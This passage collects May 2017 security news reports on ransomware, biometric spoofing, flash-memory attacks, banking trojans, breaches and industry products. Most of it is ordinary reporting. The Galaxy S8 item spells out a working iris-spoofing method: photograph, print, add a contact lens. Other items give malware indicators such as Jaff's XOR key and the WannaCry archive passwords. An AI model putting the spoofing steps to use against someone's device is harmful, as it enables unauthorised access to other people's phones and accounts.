“The Word macros generate an initial URL to download an encoded Jaff binary, then we see one other URL for post-infection callback from an infected host. The initial HTTP request for Jaff returns an encoded binary that's been XORed with the ASCII string I6cqcYo7wQ,” Duncan reveals.

The same as the initial Jaff variant, the new version targets over 400 file types. After completing the encryption process, it drops a ransom note to inform the victim on what happened and to provide information on how they can pay the ransom.

Because of its alleged connection with a large crime group, Jaff has the potential of becoming a major threat fast. WannaCry might have stolen the headlines for the past days, but Jaff is slowly growing to become a prevalent threat.


Vera Enables Multi-Factor Authentication for Specific Data

25.5.2017 securityweek  Safety
Multi-factor authentication (MFA) is the security industry's response to failings in the simple and traditional userID/password authentication approach. MFA is considered to be a primary solution to help defeat phishing and to demonstrate compliance. But it suffers from one major drawback: user friction.

Put simply, MFA delays business. Users don't like it, and business managers see it as a delay in business processes. The industry is responding with attempts to reduce that friction. Earlier this week, Preempt launched a product that applies behavioral-based MFA to specified applications. Now Vera has announced an add-on to its data-centric solution that allows MFA to be limited to specified data.

Vera's methodology is to attach the additional authentication requirement to an existing data classification. Assuming particularly sensitive data is already classified within the Vera product as 'secret' (or perhaps, given the imminence of the European General Data Protection Regulation (GDPR), as 'PII'), then the additional MFA will be automatically applied to all such labeled data.

The result is that any attempted access to that data -- wherever the data is located or whomever the applicant is -- will result in an MFA challenge. This process defends the data against successful phishing (an attacker may steal log-in credentials, but won't get by the MFA challenge) and simultaneously helps ensure compliance with PII-protecting regulations.

"Providing the right level of protection to enterprise data is," explains Prakash Linga, CTO and co-founder of Vera, "key to complying with regulations like the NY DFS and the EU GDPR. Furthermore, the ability to layer context-driven authentication to specific files and emails lets companies appropriately protect their information wherever it travels."

The process does not require that all recipients of Vera MFA-protected data be Vera customers. If a protected document is sent to a trusted but external recipient, Vera will first validate the email address and then challenge the recipient with Vera's native two-factor Twilio-based authentication challenge.

"Alongside our own native capabilities, we're also launching integrations with Duo Security and RSA SecureID to let businesses simplify their multi-factor authentication strategy," announced Chuck Holland, Vera's director of product management, in an associated blog post. The Duo and SecureID are 'out-of-the-box' plug and play integrations.

Earlier this month, Vera announced a strategic investment of $15 million led by Hasso Plattner Ventures. Yair Re'em, general partner of Hasso Plattner Ventures, said at the time his firm's first venture into cybersecurity is prompted by "the crumbling state of enterprise security [which] has clearly demonstrated the need for a fundamental paradigm shift in cybersecurity."

Talking about Vera's adoption of data-centric security over perimeter-based security, new board member Chris Rust said, "The enterprise network perimeter has collapsed and those clinging to solutions trying to save or resurrect it are fighting a battle long since lost. Vera is the driving force behind a positive and profound shift away from perimeter-based security and towards a more flexible and reliable data-centric model."

Vera's new MFA offering adds strong authentication to corporate data wherever it travels.


Ex-CIA Chief Says He Warned Russia to Stay Out of Election

25.5.2017 securityweek  CyberSpy
Former CIA director John Brennan said Tuesday that he warned Russia last summer against meddling in the US presidential election but the Russians went ahead and did it, anyway.

"It should be clear to everyone that Russia interfered in our 2016 presidential election process," Brennan said in testimony to the House Intelligence Committee, which is investigating possible collusion between Russia and President Donald Trump's campaign.

"And that they undertook the activities despite our strong protests and explicit warning they not do so," said Brennan, who served as CIA director from 2013 until January of this year when Trump took office.

Brennan told how he called the head of the Russian intelligence service, the FSB, on August 4 of last year.

"I said that all Americans, regardless of political affiliation or whom they might support in the election, cherished their ability to elect their own leaders without outside interference," Brennan said.

"I said American voters would be outraged by any attempt to interfere in the election," he added.

Brennan's interlocutor denied any Russian interference but said he would pass on the warning to President Vladimir Putin, the ex-CIA chief said.

Brennan reiterated that the CIA detected in 2016 possible signs of collusion between Trump associates and Russian officials.

Those contacts are now being investigated by committees in both chambers of the US Congress and by recently appointed special counsel Robert Mueller, a former FBI director.

"I encountered and became aware of information and intelligence that revealed contacts and interactions between Russian officials and US persons involved in the Trump campaign," Brennan said.

He said he did not know if this amounted to outright collusion.

"I know there was a sufficient basis of information and intelligence that required further investigation" by the FBI, he added.

Trump vehemently denies any collusion and says he is the victim of an unprecedented witch hunt.

Brennan also addressed news reports that Trump, in an Oval Office meeting this month with the Russian foreign minister and ambassador, shared highly classified information provided by a US ally about an Islamic State group plot to bring down civilian airliners with bombs hidden in laptop computers.

Brennan said that if these reports are true, Trump violated two intelligence protocols.

First, he said, such intelligence is not shared with ambassadors but rather through intelligence channels.

And before such intelligence is shared, the country that provided it must be warned so as not to jeopardize sources or methods, Brennan said.

"It appears, at least from the press reports, that neither did it go in the proper channels nor did the originating agency have the opportunity to clear language for it," Brennan said.

"That is a problem."


Samsung Investigating Galaxy S8 'Iris Hack'

25.5.2017 securityweek  Mobil
Samsung Electronics is investigating claims by a German hacking group that it fooled the iris recognition system of the new flagship Galaxy S8 device, the firm said Wednesday.

The launch of the Galaxy S8 was a key step for the world's largest smartphone maker as it sought to move on from last year's humiliating withdrawal of the fire-prone Galaxy Note 7s, which hammered the firm's once-stellar reputation.

But a video posted by the Chaos Computer Club (CCC), a German hacking group founded in 1981, shows the Galaxy S8 being unlocked using a printed photo of the owner's eye covered with a contact lens to replicate the curvature of a real eyeball.

"A high-resolution picture from the internet is sufficient to capture an iris," CCC spokesman Dirk Engling said, adding: "Ironically, we got the best results with laser printers made by Samsung."

A Samsung spokeswoman said it was aware of the report and was investigating.

The iris scanning technology was "developed through rigorous testing", the firm said in a statement as it sought to reassure customers.

"If there is a potential vulnerability or the advent of a new method that challenges our efforts to ensure security at any time, we will respond as quickly as possible to resolve the issue."

Samsung's hopes of competing against archrival Apple's iPhone had been pinned on the Galaxy S8 after last year's Note 7 disaster.

The recall debacle cost Samsung billions of dollars in lost profits and hammered its global credibility, forcing it to apologise to consumers and postpone the S8 launch.

But since it was released in April it has received positive reviews and strong orders.

The CCC previously demonstrated a way to defeat Apple's TouchID fingerprint sensors -- using graphite powder, a laser etching machine and wood glue -- just weeks after the first iPhone 5s hit the shelves.

Traditional PIN protection was "a safer approach than using body features for authentication", Engling said.


Apps Essential to Modern Living But Treated Carelessly: Report

25.5.2017 securityweek  Security
A new research report takes an unusual angle. Rather than analyzing a threat or an attacker, it looks at the psychology of the user -- or more specifically, the user of smartphones and apps. What it found is that the modern use of apps is so interwoven with daily life, they have almost become part of their users' DNA.

The Application Intelligence Report (AIR: PDF) is a new intelligence survey produced by A10 Networks. A10 surveyed 2,000 business and IT professionals in more than 20 different countries -- and it is important to note that these were professionals rather than unemployed teenagers glued to their phones.

The purpose, says Andrew Hickey in an associated blog, a director at A10 Networks, is to "better understand how the global workforce's experiences and behaviors with apps impact personal and corporate security... Why they use them. Their perception of personal and business security when using them. And potential behavioral risks to businesses and IT teams."

The result is sobering, and could fuel a raft of psychology and sociology theses. It first demonstrates how apps and their use is deeply interwoven into everyday life. For example, 42% of respondents globally say they 'cannot live without their apps' while another 44% said 'it would be a struggle' to live without them.

The detail varies by both age demographic and geolocation. Newly emerged and emerging economies seem particularly attached or reliant on their apps: China (99%), India (97%), Brazil (96%) and South Korea (90%). It is the older economies that seem less reliant. Germany ranks highest of participants who say, 'I can easily live without apps' (30%), followed by France (23%), and Great Britain and Japan (21%). Similarly, respondents under the age of 40 are much more likely to say they cannot live without apps than those over 40.

This basic pattern largely repeated itself throughout the survey. For example, in an emergency that would allow people to take only one item, 45% of respondents elected to grab their phone. It was 74% in China, but only 29% in France.

While details such as these are interesting and possibly surprising (perhaps depending on the reader's geolocation and age demographic), it is the attitude towards security that becomes sobering. "At least four out of five (83%) respondents either agree or strongly agree that they think about security risks when first downloading an app," says the report, "but after that, security becomes much less of a thought or priority in dictating behavior."

One reason seems to be a belief that it is the developer, or the company IT department, that is responsible for app security. Forty-seven percent of respondents "expect to be protected from cyber-attacks by either their company or third-party app developers."

This lax personal attitude to security best shows itself in the use of passwords. One in 10 (11%) of all respondents said they never change their passwords for their apps, while another three out of 10 (29%) use the same password for the majority of their apps. Fewer than one in five (17%) use a different password for every app. The usual demographics apply: 50% of the 21-30 demographic either never change passwords or use the same password the majority of the time, compared with only 26% of those aged over 50.

Surprisingly, the US (49%) is second only to South Korea (52%) in using the same password for the majority of apps -- but less surprisingly, Germany leads in best practices for those who use different passwords (34%).

The effect of poor personal security is born out in practice. Globally, 13% of all respondents have been the victim of identity theft. This grows to 39% in China (a figure that, pro rata, suggests more people than the entire population of the US). Thirty-one percent of respondents have had their phone hacked; and 24% of respondents under the age of 30 have had their phone stolen.

A10 Network draws few conclusions from this report, instead inviting its study and promising to 'dig deeper' in the future. "From a cultural perspective," blogs Hickey, "IT can study the app-blended life, consider user behavior as a factor in security planning, build enterprise-wide security awareness and influence a security-minded culture.

"And from a technology perspective, IT pros can use this data to make the case for improved per-app visibility, per-app analytics, performance, removal of security blind spots and implementation of tighter controls across all application environments." But one thing is immediately obvious: companies with a BYOD policy cannot afford to leave the security of mobile devices to the user.


Target agreed to pay $18.5 Million over 2013 data breach
25.5.2017 securityaffairs Incindent

Target, the US retail giant, has entered a settlement with the US Attorneys General and it has agreed to pay $18.5 million over the 2013 data breach.
Target, the US retail giant, has entered a settlement with the Attorneys General of 47 states and it has agreed to pay $18.5 million over the data breach suffered in 2013.

Nearly 40 Million credit and debit card accounts belonging to Target customers have been stolen during the traditional holiday shopping season in 2013.

The company intends to compensate the costs incurred by its customers and to compensate for the damage it has caused to the consumers.

Target data breach

The company will pay the overall amount of money to all the Attorneys General involved in the investigations, $1.2 million will be paid to the Illinois Attorneys General and roughly $1 million to the Connecticut that lead the legal action against the company.

According to the settlement, Target accepted to implement an information security program to protect its customer.

“TARGET shall, within one hundred and eighty ( 180) days after the Effective Date of this Assurance, develop, implement, and maintain a comprehensive information security program (” Information Security Program”) that is reasonably designed to protect the security, integrity, and confidentiality of Personal Information it collects or obtains from Consumers.” reads the settlement.

The Information Security Program shall cover administrative, technical, and physical safeguards appropriate to:

The size and complexity of TARGET’ s operations;
The nature and scope of TARGET’ s activities;
The sensitivity of the Personal Information that TARGET maintains.
The company will adopt further measures to protect its customers, including network segmentation, access control, and management, file integrity monitoring, whitelisting, logging, change control, and the adoption of payment card security technologies.

The settlement established that the cyber security of the company’s systems must be assessed by a third-party, at the same time the company has to audit any vendor or subcontractor it works with. Let’s remind that the hackers that broke into the company payment systems used as entry point an HVAC contractor.

Target admitted last year that the data breach had cost it $290 million, the company paid $67 million to Visa card issuers, $19 million to MasterCard card issuers, over $20 million to banks and credit unions, and $10 million to the affected consumers.


The NAND Busters Data Storage Chips Vulnerable to Attack
25.5.2017 securityaffairs Vulnerebility

Experts found that NAND Data Storage Chips are vulnerable to malicious programs which can corrupt data and even destroy them over time.
Researchers at Carnegie Mellon University, Seagate Technology and Swiss Federal Institute of Technology in Zürich have uncovered a potential flaw in the storage devices that power most cell phones, computers and big data centers around the world. The researchers found that the special chip arrays used to store information are vulnerable to malicious programs which can corrupt data and even destroy the chips over time.

NAND flash memory chips installed on a board array are called solid-state drives (SSDs). The SSDs have all but replaced the venerable magnetic disk hard drives, allowing manufacturers to reduce the size and weight of electronic devices. NAND flash memory chips are found inside most of the current state of the art electronics and often occupy space in our pockets from portable phones, cameras, and USB drives. They are also the heart of massive data centers that power the cloud, holding vast amounts of data for individuals, major corporations, and government.

A key feature of the NAND flash chip is its ability to store a charge without power. The NAND chip contains billions of cells each with different electrical charges which represent the binary ones and zeros that make up data. They are also controlled by an internal architecture which is designed to keep all that data in order. The researchers, working with the assistance of Intel and Seagate, found that the cells inside each chip can be corrupted by programs which abuse the sub-scale electronics and can eventually render them useless.

NAND attacks

Once such exploit discovered by the researchers is a program that rapidly writes, reads and resets data inside a NAND storage chip. The attacker repeatedly performs this series of attacks against individual chip cells holding the binary ones and zeros, causing them to overload and generate interference against other nearby “victim” cells inside the chip. The result is a phenomenon called “Parasitic Capacitance Coupling” which changes the voltage in adjacent memory cells and thereby changes the value of the data stored inside them. The attacker can alter the data stored in targeted victim cells thus data stored by other programs is now corrupted.

As chips become smaller and more powerful, the space between the electronic connections and memory cells has been reduced as well. The fact that these electronic connections are in some cases only a few molecules apart is like having bare copper wires carrying voltage lying next to each other. They often do not have to touch to create disturbance in other nearby components.

This type of interference attack has been described to be similar to a “Row hammer” attack used against the more familiar RAM (Random Access Memory) chips inside computers, where an attacker bombards a row of memory cells in repeated read-write operations, causing electrical interference that changes the values of nearby cells.

“Row hammer” attacks are deliberately introduced interference using software programs. However, Nature can also cause similar errors inside storage memory chips operating under harsh conditions. For example, solar flares and intense radiation have been known to induce the cells inside computer chips – both RAM and Flash – to change values.

Special programming techniques and manufacturing processes called “RAD” hardening had to be introduced for chips installed inside satellites, military equipment, space craft and nuclear reactors to prevent “bit flipping”, changing cell values induced by the Electro-Magnetic Pulse (EMP) of solar flares, and radiation.

According to the researchers, a malicious program can re-create the same kind of EMP electronic interference on a sub-scale. They discovered that such software can take advantage of the NAND chip design and structure to work around safeguards to target specific cells.

While The NAND memory chip can compensate for damaged cells, as more and more cells are attacked, the chip eventually becomes useless and is unable to reliably store information. The attack can dramatically reduce the useable lifetime of the chip, forcing it to be replaced. This replacement process usually would require and entire board or bank of chips to be replaced in high-end applications such as cloud memory, an expensive and time-consuming process.

However, unlike massive cloud and computer storage arrays, the NAND flash memory chips inside consumer devices are usually not replaceable. The malicious software attack could force an entire device to be replaced such as a cell phone, notepad computer or Internet of Things device.

Researchers also discovered a second method of attack called “Read Disturb”. The attack is characterized by a malicious application to quickly perform a large number of reads in a very short amount of time, to induce “Read Disturb” errors that corrupt both data already written to the chip and data that have yet to be written. The basic concept is to corrupt unwritten blocks or cells which are not managed by the chip structure programming. The result is the un-used data cells are corrupted and cannot be repaired because they are outside of the chip management and control.

While the second level of attack does not disrupt already written data by other programs it does eventually destroy the chip and reduce its lifetime of use.

The researchers also suggested their own form of “RAD” hardening in order to reduce the chance of attacks and increase the lifetime of the NAND flash chips. The best solution was to internally buffer data being read and written to the NAND flash drive itself. The concept is that the buffer will absorb all the read and write activity and then place the data correctly into each NAND memory cell. While this method would consume additional overhead in time, up to 15%, and an additional 2 MB of storage, it would also eliminate the chip vulnerability to being corrupted by either the “Capacitance Coupling” or the “Read Disturbance” attacks.

The research paper – titled “Vulnerabilities in MLC NAND Flash Memory Programming: Experimental Analysis, Exploits, and Mitigation Techniques” is available at:

https://pdfs.semanticscholar.org/b9bc/a3c9f531002854af48de121cdcc8e0520c7f.pdf

Charles R. Smith is CEO of Softwar Inc. a US based information warfare company and a former national security journalist. You can find Softwar at https://www.softwar.net


Qatar's State News Agency Hacked by 'Unknown Entity': Official

24.5.2017 securityweek Hacking
Qatar said Wednesday its official state news agency was hacked and subsequently carried a "false statement" on sensitive regional topics attributed to the country's Emir, Sheikh Tamim bin Hamad Al-Thani.

Amid an apparent wide-scale security breach it was also reported that the agency's official Twitter account had also been attacked.

Among the issues allegedly addressed by the Qatari ruler in the statement were the Palestinian-Israeli conflict, strategic relations with Iran, and comments about Hamas.

There were also alleged negative remarks about Qatar's relationship with the new administration of US President Donald Trump.

Amid the confusion, Doha said the statement which had appeared on its website and was attributed to the country's ruler was completely untrue.

"The Qatar News Agency website has been hacked by an unknown entity," reported the Government Communications Office in a statement.

"A false statement attributed to His Highness has been published."

The communications office added that an investigation would be launched into the security breach.

The "false statement" posted online claimed the emir spoke on Tuesday, two days after the Qatari leader and Trump met in Saudi Arabia as part of the president's recent visit to the Middle East.

The remarks on QNA were picked up and reported by broadcasters in the region, including some in the United Arab Emirates.

They also caused a stir on social media in the Gulf, before Doha scrambled in the early hours of Wednesday morning to deny the claims.

Doha-based broadcaster Al Jazeera also reported that the QNA Twitter account had been hacked and "fake" reports that Qatar was withdrawing ambassadors from several countries in the region were subsequently denied.

The communications office added that the "State of Qatar will hold all those" who committed the breach accountable.

The attack on Qatar's official news agency comes just days after Doha claimed it had been the victim of an orchestrated smear campaign over its alleged "support" for terrorism.

Last weekend, Doha's communications office released an official statement claiming the gas-rich emirate was being attacked by anti-Qatar organisations.

Doha has faced criticism in some quarters for its support of rebel groups fighting Syrian President Bashar al-Assad.

In recent weeks, Qatar has been accused outright of terror funding in articles which have appeared in the American media.

Qatar is also home to the former leader of Hamas, Khaled Meshaal, who earlier this month used his Doha base, where he has lived in exile for several years, to launch a new policy document.


Russian Hackers Infected 1 Million Phones With Banking Trojan

24.5.2017 securityweek Virus
Russia Dismantles Major Cybercrime Operation Targeting Bank Accounts via Android Malware

The Russian Interior Ministry announced on Monday that authorities dismantled a major cybercrime gang that had stolen nearly $900,000 from bank accounts after infecting more than one million Android smartphones with a Trojan.

Authorities said they identified 20 suspects in Moscow and five other regions of Russia. They believe the group was led by a 30-year-old living in the city of Ivanovo.

Group-IB, the Russian cybersecurity firm that assisted the government’s investigation, reported that 16 members of the group were detained in November 2016, while the last active member was apprehended in April.

The group used an Android banking Trojan dubbed “Cron,” which researchers first spotted in March 2015, when cybercriminals had been distributing it disguised as Viber and Google Play apps.

Roughly one year later, experts noticed that someone had offered to rent an Android banking Trojan dubbed “Cron Bot.” In an analysis of the mobile malware market, IBM X-Force researchers reported in April 2016 that Cron Bot had been leased for between $4,000 and $7,000, depending on the package.

The cybercrime gang targeted by Russian authorities used spam SMS messages to deliver the Trojan to individuals in Russia. The messages informed recipients that their ads or photos had been posted on a website, and included links to a site that tricked users into downloading and installing the malware. The threat had been disguised as various apps, including Avito, Pornhub, Framaroot and Navitel.

Once it infected a device, the Trojan allowed the cybercrooks to steal and hide SMS messages coming from banks, and send SMSs to specified numbers. Since many Russian banks allow their customers to conduct transactions via SMS, these features allowed the fraudsters to transfer money from the victims’ accounts into their own.

According to Group-IB, the gang opened more than 6,000 bank accounts to which they transferred the stolen funds. Investigators said the Cron malware was used to steal an average of $100 (8,000 rubles) from 50-60 bank customers each day.

The cybercriminals managed to infect more than one million smartphones and stole nearly $900,000 (50 million rubles).

Following the success of their operation in Russia, the group decided to expand to other countries with the aid of a banking Trojan named Tiny.z, which they rented for $2,000 per month. Tiny.z uses overlay screens adapted to each targeted bank’s mobile application in order to trick victims into handing over personal and financial details that can be leveraged to steal money from their account.

The Cron gang had been planning on hitting France first, and they developed web injections for several of the country’s banks, including Credit Agricole, Assurance Banque, Banque Populaire, BNP Paribas, Boursorama, Caisse d'Epargne, Societe Generale and LCL. However, law enforcement managed to disrupt their operations before they could launch attacks on French banks.


WannaCry 'Highly Likely' Work of North Korean-linked Hackers, Symantec Says

24.5.2017 securityweek Ransomware
North Korea-linked Lazarus Hacking Group is "Highly Likely" to be Responsible for the Global "WannaCry" Ransomware Attack, Symantec Says

Analysis of the tools and infrastructure used in the WannaCry ransomware attacks reveal a tight connection between the threat and the North Korean hacking group Lazarus, Symantec claims.

The global outbreak on May 12 drew the world’s attention to WannaCry, but the threat had been active before that, the security researchers say. Over 400,000 machines have been hit by WannaCry to date, although not all had been infected, courtesy of a kill-switch domain registered shortly after the attack began.

The first WannaCry variant, however, emerged in February, and security researchers already discovered a possible tie between it and the Lazarus group, although some suggested such a connection was far-fetched.

North Korea has denied involvement in the ransomware outbreak.

The Lazarus group (also known as BlueNoroff) was previously associated with a number of devastating attacks, including the Sony Pictures hack in 2014 and the $81 million cyber heist from Bangladesh's account at the New York Federal Reserve Bank in 2016. Recently, Kaspersky suggested that the group could be the most serious threat to banks.

Symantec now says that tools previously associated with the group were found on computers infected with WannaCry. Before the May 12 attack, the ransomware was used in a small number of targeted campaigns in February, March, and April, and the variants are almost identical, save for the method of propagation (the recent version uses the NSA-linked EternalBlue exploit).

According to Symantec, these attacks show “substantial commonalities in the tools, techniques, and infrastructure used by the attackers and those seen in previous Lazarus attacks, making it highly likely that Lazarus was behind the spread of WannaCry.”

Despite that, however, “the WannaCry attacks do not bear the hallmarks of a nation-state campaign but are more typical of a cybercrime campaign,” the security researchers admit. Prior to the May 12 campaign, WannaCry was using stolen credentials to spread across infected networks and didn’t employ the leaked EternalBlue exploit.

After the first WannaCry attack in February, experts discovered three pieces of malware linked to Lazarus on the victim’s network, including the Volgmer Trojan and two variants of the Destover backdoor (the disk-wiping tool used in the Sony Pictures attacks).

Moreover, the researchers discovered that WannaCry used the Alphanc Trojan for distribution in the March and April attacks, and that this malicious program is a modified version of the Lazarus-linked Duuzer backdoor.

Symantec also found the Bravonc backdoor, which has similar code obfuscation as WannaCry and Fakepude info-stealer (also linked to Lazarus), and the Bravonc Trojan, which used the same IP addresses for command and control (C&C) as Duuzer and Destover, both linked to Lazarus.

Finally, there is the shared code between the previous WannaCry ransomware version and the Lazarus-linked Contopee backdoor.

The February WannaCry attack hit a single organization but compromised over 100 computers within two minutes after the initial infection. A variant of the Mimikatz password-dumping tool was used for compromise, with a second tool used to copy and execute WannaCry on other network computers using the stolen passwords.

In addition to these tools, the security researchers found five other pieces of malware on a second computer on the victim’s network, and three of them were linked to Lazarus: Volgmer and the two variants of Destover.

A new sample of WannaCry emerged in late March, and five organizations were infected with it. The Alphanc and Bravonc backdoors were employed in these attacks, with the former used to drop WannaCry onto the compromised computers of at least two victims. Alphanc is believed to be an evolution of Duuzer, a sub-family of the Destover wiping tool used in the Sony attacks.

These attacks hit organizations spanning a range of sectors and geographies, but Symantec found evidence of the tools used in the February attacks on the computers compromised in March and April as well.

The Bravonc Trojan was used to deliver WannaCry to the computers of at least two other victims, the security researchers say. The malware connects to a C&C server hosted at the same IP address as the IP address used by Destover and Duuzer samples, and which was also referred to in a Blue Coat report last year.

“The incorporation of EternalBlue transformed WannaCry from a dangerous threat that could only be used in a limited number of targeted attacks to one of the most virulent strains of malware seen in recent years. It caused widespread disruption, both to organizations infected and to organizations forced to take computers offline for software updates,” Symantec explained.

The security firm also notes that the passwords used to encrypt the ZIP files embedded in the WannaCry dropper are similar across versions ("wcry@123", "wcry@2016", and "WNcry@2ol7") suggesting they come from the same actor. Further, the use of a small number of Bitcoin addresses in the initial version and its limited spread indicates that it wasn’t a ransomware family shared across cybercrime groups.

“Aside from commonalities in the tools used to spread WannaCry, there are also a number of links between WannaCry itself and Lazarus. The ransomware shares some code with Backdoor.Contopee, malware that has previously been linked to Lazarus. One variant of Contopee uses a custom SSL implementation, with an identical cipher suite, which is also used by WannaCry. The cipher suite in both samples has the same set of 75 different ciphers to choose from (as opposed to OpenSSL where there are over 300),” Symantec says.

The small number of earlier WannaCry attacks provides sufficient evidence to link the ransomware to Lazarus, Symantec says, given the significant use of tools, code, and infrastructures previously associated with the group. The company also notes that leak of the EternalBlue exploit was what turned the malware into a far more potent threat than it would have been if it continued to use own tools.


Average Patching Time for SCADA Flaws Is 150 Days: Report

24.5.2017 securityweek ICS
Supervisory control and data acquisition (SCADA) systems, particularly human-machine interfaces (HMI), can be a tempting target for malicious actors, but it takes vendors, on average, 150 days to patch vulnerabilities in these types of products, according to a new report from Trend Micro and the Zero Day Initiative (ZDI).

The report published on Tuesday is based on the analysis of hundreds of vulnerabilities documented in 2015 and 2016 by ICS-CERT and ZDI.

Researchers pointed out that attackers may target the HMI of a SCADA system for several reasons. Since HMI is a critical component in the management of industrial systems, including critical infrastructure, it can provide access to information that may be highly valuable in a sophisticated attack.

Attackers can also cause physical damage to SCADA equipment once they have compromised the HMI. Furthermore, malicious actors could leverage the HMI to disable alarms and notifications designed to alert operators of dangerous configurations or values.

Since HMIs are typically Windows-based applications rather than web-based apps, vulnerabilities such as cross-site scripting (XSS) and cross-site request forgery (CSRF) are less common. The most common types of flaws uncovered in the past two years are related to lack of authentication/authorization and weak default configurations (23%), memory corruption bugs (20%), credential management vulnerabilities (19%), and code injections (9%).

The average time from disclosure to the release of a patch has not improved much in the past four years. While there are some vendors that manage to patch SCADA vulnerabilities within one week of disclosure, the average time has been roughly 150 days in 2015 and 2016.

Experts pointed out that some smaller vendors, such as Cogent Real-Time Systems and Trihedral Engineering, patch vulnerabilities faster, while larger companies, such as ABB and GE, have an average response time of more than 220 days.

Average time it takes to release patches for SCADA products

Compared to other industries, SCADA vendors are roughly at the same level as cybersecurity firms when it comes to how fast they patch vulnerabilities. Vendors of popular software, such as Microsoft, Apple, Oracle and Adobe, have a response time of under 120 days, while business software developers are significantly slower, with an average of 189 days.

Trend Micro’s report includes case studies for each type of vulnerability affecting SCADA systems. The case study for memory corruption vulnerabilities describes a buffer overflow in Advantech’s WebAccess HMI, which could have been exploited to execute arbitrary code with elevated privileges.

As for credential management issues, which include hardcoded passwords and insufficiently protected credentials, the security firm shared an analysis of the MDS PulseNET product from General Electric (GE).

The case studies also cover code injections in Cogent DataHub, and authentication and authorization-related flaws in Advantech WebAccess and Siemens SINEMA Server.

The complete report, titled “Hacker Machine Interface - The State of SCADA HMI Vulnerabilities,” is available for download in PDF format.


Hackers Defeat Samsung Galaxy S8 Iris Scanner

24.5.2017 securityweek Mobil
Hackers of the Chaos Computer Club (CCC) in Germany have managed to defeat the iris recognition system on Samsung’s flagship Galaxy S8 smartphones.

The Samsung Galaxy S8 has several biometrics-based authentication systems, including face recognition, a fingerprint scanner, and an iris scanner. The iris authentication, which allows users to unlock their device and authorize payments, is advertised by Samsung as “one of the safest ways to keep your phone locked.”

While an individual’s iris is unique, researchers from CCC showed that Samsung’s iris scanner can be defeated by showing it a picture of the victim’s eye. It’s worth noting that members of the CCC were the first to bypass Apple’s fingerprint-based Touch ID system after its introduction in 2013.

Experts say there are several ways to obtain iris data, including from high-resolution pictures posted by users themselves on the Internet. Another method is to take a picture of the targeted individual’s eye using a digital camera with night-shot mode or the infrared filter disabled.

Researchers demonstrated that a camera with a 200mm lens can capture a usable picture of the iris from up to five meters (16 feet).

“In the infrared light spectrum – usually filtered in cameras – the fine, normally hard to distinguish details of the iris of dark eyes are well recognizable,” the CCC said. “Depending on the picture quality, brightness and contrast might need to be adjusted.”

Once the picture of the iris has been obtained, it can be printed out using a laser printer – the best results were, ironically, obtained on a Samsung printer. The last step is to place a contact lens on top of the print to mimic the curvature of a real eye. Placing the photo in front of the Galaxy S8’s iris scanner successfully unlocks the device.
SecurityWeek has reached out to Samsung for comment and will update this article if the company responds.

This is not the first time someone has targeted the biometrics features of the Samsung Galaxy S8. It was demonstrated a few weeks ago that the smartphone’s face recognition system can be bypassed simply by showing it a picture of the targeted user’s face.

The CCC said that if rumors turn out to be true and the next iPhone generation will have an iris scanner, they will try to defeat that one as well.

Biometrics are increasingly popular, especially in the financial industry. Banks are now allowing customers to use selfies, their voice and their fingerprints for authentication and authorization.

While biometric authentication is often advertised as highly secure, there are ways to defeat it. A BBC reporter demonstrated recently that his non-identical twin brother could access his HSBC account by fooling the bank’s voice ID authentication service.


Flashpoint Enhances Risk Intelligence Platform

24.5.2017 securityweek Security
Just as global intelligence firm Stratfor extracts and presents geopolitical intelligence from the noise of available information, so now does Flashpoint extract cyber business risk intelligence (BRI) from the noise of deep and dark web conversations.

Flashpoint is not new to BRI. It raised $10 million in Series B funding in July 2016 and announced its expansion from cyber threat intelligence into business risk intelligence. "Looking beyond cyber threat Intelligence, BRI ultimately informs decision-making, improves preparation, and mitigates risk throughout an entire organization," said Flashpoint at the time.

That process has now come to fruition with today's launch of the Flashpoint Intelligence Platform 3.0. It aims to convert and present the raw intelligence gleaned from the deep and dark web as actionable business risk intelligence that will help customers take a more strategic role in security planning.

Most threat intelligence ultimately comes from the deep and dark web. This is where cyber criminals share information, trade malware and boast about exploits. But access is difficult. The deepest and darkest areas are well-protected, and only accessible to 'approved' people. Flashpoint has a team of expert analysts, often with 3-letter agency backgrounds, who spend the time and effort necessary to get into the darkest corners.

This is where Flashpoint gleans its threat intelligence. It comes from actual dialogue between threat actors; from black market products and services; from where malicious tactics, techniques and procedures (TTPs) are discussed; and where weapons and training manuals are shared.

But threat intelligence falls short of business risk intelligence. "Some threat intelligence solutions can be no different than URL filtering, merely contributing to the greater noise," warns Gartner Research VP, Greg Young. "Instead, good threat intelligence solutions are customized and able to deliver a high-confidence alert to initiate an actionable response. Peering out at what often looks like a world of shadows and hostility, security teams can see specificity as a key to the achievement of their best success with limited resources."

For most organizations, access to any threat intelligence comes from surface web reports produced by different security vendors. These often discuss individual threats discovered by individual vendors, often focusing on their own product sphere. While these are valuable, they present a piecemeal view of the overall threat landscape.

In this sense, Flashpoint is vendor-neutral: it provides intelligence rather than product. Its new development is to generate and present actual risk intelligence from the raw threat intelligence. But its team of analysts don't just gather intelligence from the dark web, it converts it through analysis reports into business actionable information -- in short, it adds context that goes beyond cyber.

"Traditional cyber threat intelligence, which has been largely focused on indicators of compromise, is insufficient in supporting the risk decision-making process, as it too often limits its focus on events in cyberspace," warned Flashpoint in its Business Risk Intelligence - Decision Report, published in January 2017. "Not all actors constrain their operations solely to the cyber realm; top tier nation-states like the U.S. and Russia use the full-spectrum of their capabilities to achieve their objectives. A threat assessment of Chinese or Russian cyber operations without the context of the national objectives they are supporting fails to provide risk decision-makers with an accurate portrayal of the threat landscape upon which to make business decisions."

The Intelligence Platform 3.0 provides access to Flashpoint's analyses with a finished intelligence experience. Users can use it to search Flashpoint's reports, focusing on specific areas of interest and including both cybercrime intelligence and physical threat intelligence -- or they can pivot directly into a sanitized sandbox of the original threat actor data. The result helps the security team understand the overall threat landscape, and provides the materials necessary to translate threats into business risks consumable by senior management.


CEOs and Coffee Shops Are Mobile Computing's Biggest Risks: Report

24.5.2017 securityweek Mobil
The balance between encouraging mobility for business purposes and controlling it for security remains as tricky today as ever. Ninety-three percent of organizations are now somewhat or very concerned that the mobile workforce is presenting an increasing number of security challenges. Of these, 47% are 'very concerned'; a figure that has grown from 36% a year ago.

These figures come from the iPass 2017 Mobile Security Report (PDF), published today. iPass is a global provider of always-on, secure Wi-Fi; with more than 60 million hotspots in more than 120 countries.

Vanson Bourne surveyed 500 CIOs and senior IT decision makers from the US (200), UK (100), Germany (100) and France (100). While the results are broadly consistent across all regions, there are nevertheless some surprising differences. For example, while there is acknowledgement that security is needed, there is apparent recognition that control is difficult -- and the extent of the problem and ways to solve it differ by geographic region.

